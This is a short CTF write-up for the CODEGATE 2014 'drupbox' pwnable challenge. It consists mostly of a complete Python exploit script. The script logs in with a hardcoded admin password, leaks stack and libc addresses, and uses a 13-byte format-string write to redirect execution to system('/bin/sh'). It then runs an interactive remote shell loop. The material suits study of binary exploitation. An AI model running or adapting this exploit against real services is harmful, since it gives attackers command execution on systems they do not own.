CODEGATE CTF 2014 - drupbox

Overview

Category : Pwnables

File :

drupbox

Summary : make failure chdir(), get admin password, 13byte fsb

Exploit

#!/usr/bin/python

from socket import *
from struct import pack,unpack

p = lambda x:pack("<L",x)

s = socket(AF_INET,SOCK_STREAM)
s.connect(("localhost",8887))

raw_input()

print s.recv(1024)
s.send("1\n")
print s.recv(1024)
s.send("admin\n")
print s.recv(1024)
s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n")
print s.recv(1024)
s.send("2\n")

print s.recv(1024)
s.send("XXXX\n")

print s.recv(1024)
d = s.recv(1024)

stack = unpack("<L",d[4:8])[0]+0xa4
lib = unpack("<L",d[8:12])[0] - 0x39ac4e + 0xe000
code = unpack("<L",d[32:36])[0] - 0x1197

print hex(code)

system_addr = lib+0x41260
system_arg = stack - 0x38e
read_plt = code + 0xbd0
pppr = code + 0xf47

print hex(stack)
print hex(lib)
raw_input(">value")

num =  ((stack&0x0000ffff) - 4)-926

payload = ""
payload += p(system_addr)
payload += "aaaa"
payload += p(system_arg)

s.send("4\n")
s.recv(1024)

s.send("1\n")

s.recv(1024)
s.send("admin\x00"+payload+"\x00\x00\x00\x00/bin/sh\n")

s.recv(1024)
s.send("y0uC4nn0tgu355th1sp4ssw0rd!#@#!@!$!#@\n")

s.recv(1024)
s.send("5\n")

s.recv(1024)
s.send("%"+str(num)+"c%12$hn")

raw_input(">")
s.recv(1024)

while 1:
    comm = raw_input("$")

    if comm == "exit":
        break

    s.send(comm+"\n")
    print s.recv(1024)